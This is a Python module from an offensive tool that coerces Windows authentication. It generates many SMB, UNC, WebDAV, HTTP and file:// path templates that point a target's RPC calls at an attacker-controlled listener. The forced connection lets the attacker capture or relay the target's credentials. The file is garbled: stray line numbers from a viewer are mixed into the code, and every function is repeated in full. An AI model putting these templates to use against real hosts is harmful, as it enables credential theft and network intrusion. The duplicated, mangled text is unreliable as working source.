coercer.core.utils

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : utils.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 15 Sep 2022
  6
  7
  8import random
  9import jinja2
 10
 11
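def gen_random_name(length=8):
    """Return a random alphanumeric string of ``length`` characters.

    The templates in this module call it as ``{{rnd(n)}}`` to put a random
    share/file name inside each coercion path (presumably so that repeated
    attempts do not hit a path the target has already resolved or cached).
    The name travels to the target in clear and carries no secret, so the
    non-cryptographic ``random`` module is adequate here; do not reuse this
    helper for anything that has to be unpredictable (use ``secrets`` then).

    Args:
        length: Number of characters to generate.  Values <= 0 yield ``""``.

    Returns:
        A string drawn from ``[a-zA-Z0-9]`` of exactly ``max(length, 0)``
        characters.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    if length <= 0:
        return ""
    # One draw with replacement plus a single join, instead of building the
    # string one character at a time with ``+=``.
    return "".join(random.choices(alphabet, k=length))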
 18
 19
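def generate_exploit_templates(desired_auth_type=None, *, add_uncommon_tests=False):
    """Return the list of ``(auth_type, template)`` pairs used to coerce a target.

    Each entry pairs the listener type it expects (``"smb"`` or ``"http"``)
    with a Jinja2 template string that ``generate_exploit_path_from_template``
    renders into the path handed to the remote RPC method.  Templates use the
    placeholders ``{{listener}}``, ``{{smb_listen_port}}``,
    ``{{http_listen_port}}`` and ``{{rnd(n)}}`` (an ``n``-character random
    name from ``gen_random_name``).  Every template ends with an explicit NUL
    (``\\x00``) that survives rendering; presumably it is the terminator the
    RPC string marshalling expects, so keep it when adding entries.

    Args:
        desired_auth_type: ``"smb"`` or ``"http"`` to keep only the templates
            for that listener type; ``None`` (default) returns every template.
            Any other value matches nothing and yields an empty list.
        add_uncommon_tests: Keyword-only.  When true, a second set of rarely
            useful path shapes (forward slashes, bare ``UNC``/``UNC:`` prefixes,
            ``http://`` and ``file://`` URIs) is appended after the common set.
            This used to be a hard-coded ``False`` inside the function; the
            default preserves that behaviour.

    Returns:
        A new list of ``(auth_type, template)`` tuples, common entries first,
        in a stable order.
    """
    templates = [
        # Only ip
        ("smb", '{{listener}}\x00'),
        # SMB
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with ?
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with .
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ?
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ??
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with .
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
    ]

    if add_uncommon_tests:
        # Rarely triggering shapes; kept behind the flag so the default scan
        # stays short.  Same placeholder and trailing-NUL conventions apply.
        templates += [
            # HTTP
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),

            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),

            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", '\\UNC\\{{listener}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\x00'),

            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC\\{{listener}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\x00'),

            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC:\\{{listener}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\x00'),

            ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
            ("http", 'http://{{listener}}/EndpointName/\x00'),
            ("http", 'http://{{listener}}/\x00'),
            ("http", 'http://{{listener}}\x00'),

            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
        ]

    if desired_auth_type is None:
        return templates
    # Exact match on the tag; an unknown tag therefore yields [].
    return [(auth_type, exploit_path) for auth_type, exploit_path in templates
            if auth_type == desired_auth_type]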
131
132
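def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
    """Render one template from ``generate_exploit_templates`` into a path.

    The listener address and port suffixes are substituted into the Jinja2
    ``template``; everything else, including the template's trailing
    ``\\x00``, is returned as-is.

    Port handling deliberately differs between the two listener types:

    * ``{{smb_listen_port}}`` becomes ``"@<port>"`` only for a non-default
      port; ``445`` or ``None`` becomes ``""`` so the plain ``\\\\host\\...``
      form is produced.
    * ``{{http_listen_port}}`` always becomes ``"@<port>"`` (``"@80"`` when
      ``None``).  Presumably the ``\\\\host@port\\...`` form is what makes
      Windows route the path through its WebDAV client rather than SMB --
      confirm before "simplifying" it to match the SMB branch.

    Security note: ``template`` is evaluated by Jinja2, which can execute
    arbitrary expressions.  Only pass the constant strings produced by
    ``generate_exploit_templates``, never text obtained from the target or
    another untrusted source.  ``listener`` is injected as a render *value*,
    not into the template source, so it cannot escape the template; it is
    not validated here, though, so the caller decides what host/IP is
    acceptable.

    Args:
        template: Jinja2 template string using ``{{listener}}``,
            ``{{rnd(n)}}``, ``{{smb_listen_port}}`` and
            ``{{http_listen_port}}``.
        listener: Host name or IP address of the attacker's listener.
        http_listen_port: HTTP listener port, or ``None`` for 80.  Numeric
            strings are accepted and converted with ``int``.
        smb_listen_port: SMB listener port; ``None`` or ``445`` produce no
            ``@port`` suffix.  Numeric strings are accepted.

    Returns:
        The rendered path as a ``str``.

    Raises:
        ValueError, TypeError: If a port is neither ``None`` nor convertible
            to ``int``.
    """
    # ``{{rnd(n)}}`` in the templates calls gen_random_name(n) at render time.
    rnd = gen_random_name

    # Accept ints and numeric strings alike (argparse often hands over str);
    # the original code assumed ints and failed with "%d" on a string.
    smb_suffix = ""
    if smb_listen_port is not None:
        smb_port = int(smb_listen_port)
        if smb_port != 445:
            smb_suffix = f"@{smb_port}"

    http_port = 80 if http_listen_port is None else int(http_listen_port)
    http_suffix = f"@{http_port}"

    return jinja2.Template(template).render(
        listener=listener,
        rnd=rnd,
        http_listen_port=http_suffix,
        smb_listen_port=smb_suffix,
    )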
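def gen_random_name(length=8):
    """Return a random alphanumeric string of ``length`` characters.

    The templates in this module call it as ``{{rnd(n)}}`` to put a random
    share/file name inside each coercion path (presumably so that repeated
    attempts do not hit a path the target has already resolved or cached).
    The name travels to the target in clear and carries no secret, so the
    non-cryptographic ``random`` module is adequate here; do not reuse this
    helper for anything that has to be unpredictable (use ``secrets`` then).

    Args:
        length: Number of characters to generate.  Values <= 0 yield ``""``.

    Returns:
        A string drawn from ``[a-zA-Z0-9]`` of exactly ``max(length, 0)``
        characters.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    if length <= 0:
        return ""
    # One draw with replacement plus a single join, instead of building the
    # string one character at a time with ``+=``.
    return "".join(random.choices(alphabet, k=length))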
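def generate_exploit_templates(desired_auth_type=None, *, add_uncommon_tests=False):
    """Return the list of ``(auth_type, template)`` pairs used to coerce a target.

    Each entry pairs the listener type it expects (``"smb"`` or ``"http"``)
    with a Jinja2 template string that ``generate_exploit_path_from_template``
    renders into the path handed to the remote RPC method.  Templates use the
    placeholders ``{{listener}}``, ``{{smb_listen_port}}``,
    ``{{http_listen_port}}`` and ``{{rnd(n)}}`` (an ``n``-character random
    name from ``gen_random_name``).  Every template ends with an explicit NUL
    (``\\x00``) that survives rendering; presumably it is the terminator the
    RPC string marshalling expects, so keep it when adding entries.

    Args:
        desired_auth_type: ``"smb"`` or ``"http"`` to keep only the templates
            for that listener type; ``None`` (default) returns every template.
            Any other value matches nothing and yields an empty list.
        add_uncommon_tests: Keyword-only.  When true, a second set of rarely
            useful path shapes (forward slashes, bare ``UNC``/``UNC:`` prefixes,
            ``http://`` and ``file://`` URIs) is appended after the common set.
            This used to be a hard-coded ``False`` inside the function; the
            default preserves that behaviour.

    Returns:
        A new list of ``(auth_type, template)`` tuples, common entries first,
        in a stable order.
    """
    templates = [
        # Only ip
        ("smb", '{{listener}}\x00'),
        # SMB
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with ?
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with .
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ?
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ??
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with .
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
    ]

    if add_uncommon_tests:
        # Rarely triggering shapes; kept behind the flag so the default scan
        # stays short.  Same placeholder and trailing-NUL conventions apply.
        templates += [
            # HTTP
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),

            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),

            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", '\\UNC\\{{listener}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\x00'),

            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC\\{{listener}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\x00'),

            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC:\\{{listener}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\x00'),

            ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
            ("http", 'http://{{listener}}/EndpointName/\x00'),
            ("http", 'http://{{listener}}/\x00'),
            ("http", 'http://{{listener}}\x00'),

            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
        ]

    if desired_auth_type is None:
        return templates
    # Exact match on the tag; an unknown tag therefore yields [].
    return [(auth_type, exploit_path) for auth_type, exploit_path in templates
            if auth_type == desired_auth_type]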
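def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
    """Render one template from ``generate_exploit_templates`` into a path.

    The listener address and port suffixes are substituted into the Jinja2
    ``template``; everything else, including the template's trailing
    ``\\x00``, is returned as-is.

    Port handling deliberately differs between the two listener types:

    * ``{{smb_listen_port}}`` becomes ``"@<port>"`` only for a non-default
      port; ``445`` or ``None`` becomes ``""`` so the plain ``\\\\host\\...``
      form is produced.
    * ``{{http_listen_port}}`` always becomes ``"@<port>"`` (``"@80"`` when
      ``None``).  Presumably the ``\\\\host@port\\...`` form is what makes
      Windows route the path through its WebDAV client rather than SMB --
      confirm before "simplifying" it to match the SMB branch.

    Security note: ``template`` is evaluated by Jinja2, which can execute
    arbitrary expressions.  Only pass the constant strings produced by
    ``generate_exploit_templates``, never text obtained from the target or
    another untrusted source.  ``listener`` is injected as a render *value*,
    not into the template source, so it cannot escape the template; it is
    not validated here, though, so the caller decides what host/IP is
    acceptable.

    Args:
        template: Jinja2 template string using ``{{listener}}``,
            ``{{rnd(n)}}``, ``{{smb_listen_port}}`` and
            ``{{http_listen_port}}``.
        listener: Host name or IP address of the attacker's listener.
        http_listen_port: HTTP listener port, or ``None`` for 80.  Numeric
            strings are accepted and converted with ``int``.
        smb_listen_port: SMB listener port; ``None`` or ``445`` produce no
            ``@port`` suffix.  Numeric strings are accepted.

    Returns:
        The rendered path as a ``str``.

    Raises:
        ValueError, TypeError: If a port is neither ``None`` nor convertible
            to ``int``.
    """
    # ``{{rnd(n)}}`` in the templates calls gen_random_name(n) at render time.
    rnd = gen_random_name

    # Accept ints and numeric strings alike (argparse often hands over str);
    # the original code assumed ints and failed with "%d" on a string.
    smb_suffix = ""
    if smb_listen_port is not None:
        smb_port = int(smb_listen_port)
        if smb_port != 445:
            smb_suffix = f"@{smb_port}"

    http_port = 80 if http_listen_port is None else int(http_listen_port)
    http_suffix = f"@{http_port}"

    return jinja2.Template(template).render(
        listener=listener,
        rnd=rnd,
        http_listen_port=http_suffix,
        smb_listen_port=smb_suffix,
    )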